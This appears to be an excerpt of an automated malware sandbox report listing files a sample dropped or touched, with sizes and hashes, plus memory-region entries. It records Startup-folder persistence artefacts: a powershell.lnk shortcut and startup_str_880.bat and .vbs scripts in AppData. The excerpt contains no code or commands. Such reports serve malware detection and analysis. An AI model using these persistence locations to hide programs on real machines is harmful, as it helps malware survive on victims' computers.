                                                          4714cb72801067a0b3eed6f625085c25b4bd9cb43821b2ec696e0f44118286878aa71ddf36175699db36772edb0341521b83bf323275cdbc0ecef43fdcce1dc9

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f239b7ab-e454-48c3-976a-e371b41a6bdb\index-dir\the-real-index~RFe58467a.TMP

                                                          Filesize

                                                          48B

                                                          MD5

                                                          c682653acf6ac81e02f70d34c5dd88dc

                                                          SHA1

                                                          0972bb16161f782a9d9cc5a166fd17bddcc80c7d

                                                          SHA256

                                                          5093365da56c32a07fcc71198ec8bee47a6b1f026b1cbef4f9948248ffab473a

                                                          SHA512

                                                          74ef3551beb7fb4562ba5c1881d0c41463c901a8beae5c38fb721f9a799f30c2eaaf3a29cfb168e406eaec09244dddf843e6b36ce72e3483787927968a20509e

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                          Filesize

                                                          89B

                                                          MD5

                                                          c8058d91e85824c1a5bf2ef01bdce698

                                                          SHA1

                                                          1f6176d4ebc353cee1f7ad8528475e1c29995683

                                                          SHA256

                                                          c2e4c561fae8e2daaa9bbce54a64bdf01ea4ccf58610afa0d38620f7e5862326

                                                          SHA512

                                                          47992826a818f006ad8c52995a2d88e8bcb83ab359a989792891f69413cf62cf5b3f11970a9ae0fbe5dbd12b70763dc481e9683353b6c8b2ea55635476402bbe

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                          Filesize

                                                          146B

                                                          MD5

                                                          ef15e4043440cb4b382dfa2eaff788e0

                                                          SHA1

                                                          74fd3c2a0c64a322e237f4c4121387f96f8ad136

                                                          SHA256

                                                          6b121f7817518df00ee8f573fe3294b687f75aaf72a9d93873783f847f95595a

                                                          SHA512

                                                          b191e9ee2bf774f3205ae68cec7f873b320127c67299f6a810ec76587cc0ccf3c055b9369cc4d37a2aed86288ce31c1156b9a29a0dd76f3e43f9d046f5d4971d

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                          Filesize

                                                          82B

                                                          MD5

                                                          36b028b9b2792c9fc7e2dea9436ecc8c

                                                          SHA1

                                                          449ea8b7ac8e92ba8e4d92cd655695c2dcc5afa9

                                                          SHA256

                                                          5539d2e9539e382b99ff4950a97d6b818aa6964d2e2ddb99e0a636b93ba1984b

                                                          SHA512

                                                          f11542c5d04cf192484561e289827bb76e297ccf3329f4e34e9d2f5561047bd9cbc3e13baca295c61e3c584e4b31facd54508ae24d1f72e4a1e207f80da3699e

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                          Filesize

                                                          84B

                                                          MD5

                                                          50cfd197232b103a159c98adf19e650c

                                                          SHA1

                                                          fb1dbfe85f7ee4dd2f463087805dc739b5413240

                                                          SHA256

                                                          c664f1a98140a5c5acb9c838b72b2abf874d6c8c2c98f3b030ae49a44694c8bb

                                                          SHA512

                                                          6460d93ee9bfac221a6b3df0d228dcb950899055b83ae9aca2f42c7a9a6d6801f1761192a7e398022fb30742d8ccc20606a3eddd525a4623b9930e7655223c1e

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

                                                          Filesize

                                                          16B

                                                          MD5

                                                          46295cac801e5d4857d09837238a6394

                                                          SHA1

                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                          SHA256

                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                          SHA512

                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                          Filesize

                                                          72B

                                                          MD5

                                                          0fb53583ce9305674386e23240eb0942

                                                          SHA1

                                                          f8e04e352cb076664a8aaf8de6f5267c41a8d143

                                                          SHA256

                                                          53ab31e7b7ac489b3f6405a1df9d676c220d798505d2418aee6144230499a462

                                                          SHA512

                                                          7e7b1923b5168837b25797fbac452b14346e50840f687f3685a7500d531c193a51a8c725007f24dc783ca81ebcb190a9aa02c967e9b2dd8f83522ce8c508dfaa

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe583c77.TMP

                                                          Filesize

                                                          48B

                                                          MD5

                                                          9fe903aeddf15eddb4f7b85c8463b575

                                                          SHA1

                                                          29b7ac6ce359ed42a032048b1c218a004449aea5

                                                          SHA256

                                                          6c46cb875aa81ee3548bcbbbcad7f28d1a92139a39f19eb320849c0473523eb0

                                                          SHA512

                                                          5b097d90b39460460380400e8832e8a1fe88862effe0df800e808a397aa889e939497602b976c086dba1a133537ca0f9f149280d4d7c6a423b7bf372f66b5cd8

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                          Filesize

                                                          16B

                                                          MD5

                                                          6752a1d65b201c13b62ea44016eb221f

                                                          SHA1

                                                          58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                          SHA256

                                                          0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                          SHA512

                                                          9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                          Filesize

                                                          11KB

                                                          MD5

                                                          87ca2fa0aae44d1ed4a5eb9699a7aadb

                                                          SHA1

                                                          3b4a39a0e9c5865b1357f742d0a0421e9e305adf

                                                          SHA256

                                                          be9807b8a23d6f7199a0571854aa8efce7402e8610db9eb26e6b17a059bcf07c

                                                          SHA512

                                                          adb538710a49191b2ee43783c8839a85f01a0805a71ac71621b74ed4a8a5602f3dd839979a94a57bd4c5c767ae73a195d0f87fd5add9181204a9c8d9de9779e7

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                          Filesize

                                                          10KB

                                                          MD5

                                                          76a36d0626440ff8cce7c36f38d3f02f

                                                          SHA1

                                                          cc0d1410a751edf4bf6d343a36a46d41e55ddbf6

                                                          SHA256

                                                          14dd0c7d159a5819a9f5d1f53ec3197f87782ed087b566986ef0045304958721

                                                          SHA512

                                                          b2c4e570c4d1963b64134386b2bac37bdb07788162fb9b65dd6aa01713244d84edbf88e231d7483c9a41403a95842d2c8d60354a12a36d190f39267ee80979bd

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                          Filesize

                                                          10KB

                                                          MD5

                                                          c74b856d3d6d2cf4dbaa01f17a39722a

                                                          SHA1

                                                          2442b1785593bab15dadda940e8819f6770b94db

                                                          SHA256

                                                          1d3fc9aa03a71741178abcf5b2c95d86f7dd30427e572c2fd76c807f8d6b06d4

                                                          SHA512

                                                          4c544dd360c3d7cea92f206c2726c3e7898677d65f1f18f186deff1f05e7197ddff0a541db4e3de867b17a864a53dfa51b11dbf2250c64ae6fe20e0531a20128

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          6e6d88960a2258f4590e97c382884634

                                                          SHA1

                                                          244736513d2d071227c3df04532e67c818e7c9cd

                                                          SHA256

                                                          84cc5d85e71eed874541bd9724ebec8827a12b730b72bd8040fec29ab8a37a50

                                                          SHA512

                                                          d2d5d9aa3fb3b9ac0984f2d06da26c857f6d5479a41caa6b54e04e59b9682283219223a7b217cb9e719bad57381030aa87a9b92a6ed15d865f6d6b1eb96bce2b

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          98baf5117c4fcec1692067d200c58ab3

                                                          SHA1

                                                          5b33a57b72141e7508b615e17fb621612cb8e390

                                                          SHA256

                                                          30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                                                          SHA512

                                                          344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          f8d49a4af7a844bfc7247d5670def557

                                                          SHA1

                                                          26ae0ce194a77a7a1887cf93741293fdfa6c94c4

                                                          SHA256

                                                          61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

                                                          SHA512

                                                          9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          6d42b6da621e8df5674e26b799c8e2aa

                                                          SHA1

                                                          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                          SHA256

                                                          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                          SHA512

                                                          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3jko30g.yfz.ps1

                                                          Filesize

                                                          60B

                                                          MD5

                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                          SHA1

                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                          SHA256

                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                          SHA512

                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk

                                                          Filesize

                                                          687B

                                                          MD5

                                                          2f3920b4207d31aa9e9c79e539503021

                                                          SHA1

                                                          88205d6d8e30bf8636db878099238df15528255c

                                                          SHA256

                                                          51c2f9cfd7e2a498b916084bdd1e7c1e61b92a5046abea8c1f71552a621f975a

                                                          SHA512

                                                          2d7239ad2eab64c04f9f672865854cb761bbab31727ebccc50a81f187946bf6c3d6d113a26d66d4f5706a85aa62a9cf8d589431a3a8d9bda2adea9a0c382f85f

                                                        • C:\Users\Admin\AppData\Roaming\startup_str_880.bat

                                                          Filesize

                                                          290KB

                                                          MD5

                                                          cac585a686a51452504600d4fcf1f7b3

                                                          SHA1

                                                          cff487749ee57d6a6228622776392fa80d85041e

                                                          SHA256

                                                          876279d2efe790bf2e60a1d6bae02b08228a485d208151a5b1278e2fd11e2369

                                                          SHA512

                                                          0364f3e26c03ad92ac447aa446304dd7da7a46916ae62e70380529177416964b543da4df08e0e46221f57196513a062cc46eb80d02f2c52ea2c0cd7989e1aea9

                                                        • C:\Users\Admin\AppData\Roaming\startup_str_880.vbs

                                                          Filesize

                                                          115B

                                                          MD5

                                                          cb82f6b4868c69302aa0f0d769cbc67e

                                                          SHA1

                                                          a0f5dfa79e967f926e43814fdb372c07f6dbe338

                                                          SHA256

                                                          952d59ec8eb7e2857dfecc5fb7b30483b67005962cf37ee22c33243976271f6c

                                                          SHA512

                                                          69819516721d4fa2224e4d710891290d7ef026c89ffbb4b5119491a15d383cda82c3ea46b2eb4681b53d0a0b87d06d5e79ec80afed2e4ea95eb4f2301e57a781

                                                        • memory/1168-30-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/1168-16-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/1168-26-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/1168-27-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/1624-539-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-546-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-544-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-545-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-547-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-548-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-549-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-543-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-537-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1624-538-0x000001A32ABF0000-0x000001A32ABF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2548-49-0x000001A0B4C50000-0x000001A0B4C66000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/2548-527-0x000001A0B68F0000-0x000001A0B6E18000-memory.dmp

                                                          Filesize

                                                          5.2MB

                                                        • memory/2548-526-0x000001A0B52C0000-0x000001A0B52CC000-memory.dmp

                                                          Filesize

                                                          48KB

                                                        • memory/2548-525-0x000001A0B3F00000-0x000001A0B3F0C000-memory.dmp

                                                          Filesize

                                                          48KB

                                                        • memory/3500-0-0x00007FF85E3C3000-0x00007FF85E3C5000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/3500-50-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/3500-14-0x0000023767680000-0x00000237676B8000-memory.dmp

                                                          Filesize

                                                          224KB

                                                        • memory/3500-13-0x000002374E8C0000-0x000002374E8C8000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/3500-12-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/3500-11-0x00007FF85E3C0000-0x00007FF85EE81000-memory.dmp

                                                          Filesize

                                                          10.8MB

                                                        • memory/3500-1-0x0000023766A70000-0x0000023766A92000-memory.dmp

                                                          Filesize

                                                          136KB

                                                        • memory/5208-453-0x000002403AFC0000-0x000002403B036000-memory.dmp

                                                          Filesize

                                                          472KB

                                                        • memory/5208-452-0x000002403AF70000-0x000002403AFB4000-memory.dmp

                                                          Filesize

                                                          272KB